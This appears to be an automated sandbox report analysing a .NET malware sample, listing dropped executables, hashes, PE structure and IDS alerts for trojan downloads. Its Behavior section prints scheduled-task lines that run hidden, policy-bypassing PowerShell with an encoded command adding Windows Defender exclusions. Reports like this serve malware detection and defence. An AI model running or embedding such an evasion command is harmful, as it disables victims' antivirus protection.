                          • Execution Graph export aborted for target powershell.exe, PID 7748 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:18:40API Interceptor20x Sleep call for process: file.exe modified
                          10:18:45API Interceptor19x Sleep call for process: TypeId.exe modified
                          10:18:48API Interceptor60x Sleep call for process: powershell.exe modified
                          10:18:52API Interceptor1639331x Sleep call for process: InstallUtil.exe modified
                          10:19:02API Interceptor21x Sleep call for process: txxbiwtbs.exe modified
                          15:18:45Task SchedulerRun new task: lfuhpl path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                          15:18:45Task SchedulerRun new task: TypeId path: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                          15:18:53Task SchedulerRun new task: qugwjz path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                          15:19:02Task SchedulerRun new task: txxbiwtbs path: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TypeId.exe.log

                          Download File
                          Process:C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1242
                          Entropy (8bit):5.363036002058323
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
                          MD5:F1F711CFAECF73CB41019220224BA3D7
                          SHA1:3FBBB184F8CB609B0854E6966021CF94CD684C8A
                          SHA-256:B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
                          SHA-512:CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1242
                          Entropy (8bit):5.363036002058323
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
                          MD5:F1F711CFAECF73CB41019220224BA3D7
                          SHA1:3FBBB184F8CB609B0854E6966021CF94CD684C8A
                          SHA-256:B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
                          SHA-512:CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\txxbiwtbs.exe.log

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1242
                          Entropy (8bit):5.363036002058323
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
                          MD5:F1F711CFAECF73CB41019220224BA3D7
                          SHA1:3FBBB184F8CB609B0854E6966021CF94CD684C8A
                          SHA-256:B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
                          SHA-512:CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1510207563435464
                          Encrypted:false
                          SSDEEP:3:NlllulTkklh:NllUokl
                          MD5:8F489B5B8555D6E9737E8EE991AA32FD
                          SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                          SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                          SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                          Malicious:false
                          Preview:@...e................................................@..........

                          C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):7168
                          Entropy (8bit):4.603088616512972
                          Encrypted:false
                          SSDEEP:96:UbeKbfVuzznTurnqqXz18S355vr0xvBRl4gLab/N6aigzQ7MzNt:UHwznTurnqqXx8A5ofto/caigzk2
                          MD5:AF4A6267CE7F24818FEEB7D2D62E72C2
                          SHA1:DD780F62E9539C39244526E26E518663B53FB20E
                          SHA-256:43261F85DB3AB88ED6E6B00B4227C5E8E90DDBCABB491109196A0643AEB3D313
                          SHA-512:0A5BF9C2EBA71A6F313DAE9C288C4E616A3661CFCFAB00D30784719807006B734BD187E4C6050DDA49736A11B003AA62F21BFAC1958155B6308929C99ED4C23B
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 13%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cpf.............................0... ...@....@.. ....................................`.................................t0..J....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H........$..d............................................................0...........:......+s.,.8q...r...p8q...8v...8{...8|...8....8....8....s.......+%...o......(.........%-.2....o......X...,..,..o....2.....P.8....s....8....(....8....o....8.....8....(....8z....8y...o....8t....8s...&.3.....*.................0...........,9.8.....-.+.+.+..-.&.$(....+.o....+.(....+..+.o....(......8.....8....9r....9l....8}....,..,.+.o........+.o....(.......,D...%-).+'...........r...p .......o....

                          C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2f4b4zfu.lqx.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hrglc3bl.2fc.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgrg4qxr.1pw.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkpqi1bm.t4x.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzoyyr3e.srp.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ue3xfck3.ofe.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xiv0j5rn.pb1.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymi0bnsn.sm1.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):7168
                          Entropy (8bit):4.594339552116368
                          Encrypted:false
                          SSDEEP:96:hVoYfVBznTurnqqXi+RpKr5rUvr0JBRl4gFJNuaDXc6zNt:hv/znTurnqqX3w1oo7fJYaDs8
                          MD5:E8CE921868FE7C47FD2C236555EE5BFD
                          SHA1:BE76C59C6F1256B3A64562616A87F6F4B8B27DD1
                          SHA-256:64244E9D53EA984B731F67B6518BF4A0F030B8B76981AB5D2D36F1C5D4FAB955
                          SHA-512:41E2CB1F4C2B20D029FBBDCE4886603F8EF3CE0CA9ED763BE45801CB0085E5C44C0EA8ED36A1207E0A21977681C6865991D321734BDBF977EA48707C1FFA309D
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?gpf.............................0... ...@....@.. ....................................`.................................|0..J....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H........$..l...........................................................*+.*(....+...0...........,9.8.....-.+.+.+..-.&.$(....+.o....+.(....+..+.o....(......8.....8....9r....9l....8}....,..,.+.o........+.o....(.......,D...%-).+'...........r...p .......o....&..&....X....i2...o....(......*.8D....8v...(....8r....8}.....4......'0........X..k....................z.8........0...........:......+s.,.8q...r#..p8q...8v...8{...8|...8....8....8....s.......+%...o......(.........%-.2....o...

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):4.603088616512972
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:file.exe
                          File size:7'168 bytes
                          MD5:af4a6267ce7f24818feeb7d2d62e72c2
                          SHA1:dd780f62e9539c39244526e26e518663b53fb20e
                          SHA256:43261f85db3ab88ed6e6b00b4227c5e8e90ddbcabb491109196a0643aeb3d313
                          SHA512:0a5bf9c2eba71a6f313dae9c288c4e616a3661cfcfab00d30784719807006b734bd187e4c6050dda49736a11b003aa62f21bfac1958155b6308929c99ed4c23b
                          SSDEEP:96:UbeKbfVuzznTurnqqXz18S355vr0xvBRl4gLab/N6aigzQ7MzNt:UHwznTurnqqXx8A5ofto/caigzk2
                          TLSH:95E18510A3F94737DA670B7F9DB3964102B8FB118423CF6E2DC4920FAE11B955622B76
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cpf.............................0... ...@....@.. ....................................`................................

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0x4030be
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6670631C [Mon Jun 17 16:23:56 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x30740x4a.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x59e.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x10c40x1200076a523dfabfefb0396607bddfad06bbFalse0.5251736111111112data5.167305380306296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x40000x59e0x6003195e732dafe6dc871a7ce98075d5d4dFalse0.4231770833333333data4.078999111395673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x60000xc0x200a7c8cac5b3f4d484fec827f05dbf629fFalse0.04296875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0x405c0x31cdata0.42839195979899497
                          RT_MANIFEST0x43b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          06/17/24-16:18:47.509452TCP2017962ET TROJAN PE EXE or DLL Windows file download disguised as ASCII44349732188.114.96.3192.168.2.4
                          06/17/24-16:18:41.893163TCP2017962ET TROJAN PE EXE or DLL Windows file download disguised as ASCII44349731188.114.96.3192.168.2.4
                          06/17/24-16:18:41.893163TCP2022640ET TROJAN PE EXE or DLL Windows file download Text M244349731188.114.96.3192.168.2.4
                          06/17/24-16:18:47.509452TCP2022640ET TROJAN PE EXE or DLL Windows file download Text M244349732188.114.96.3192.168.2.4
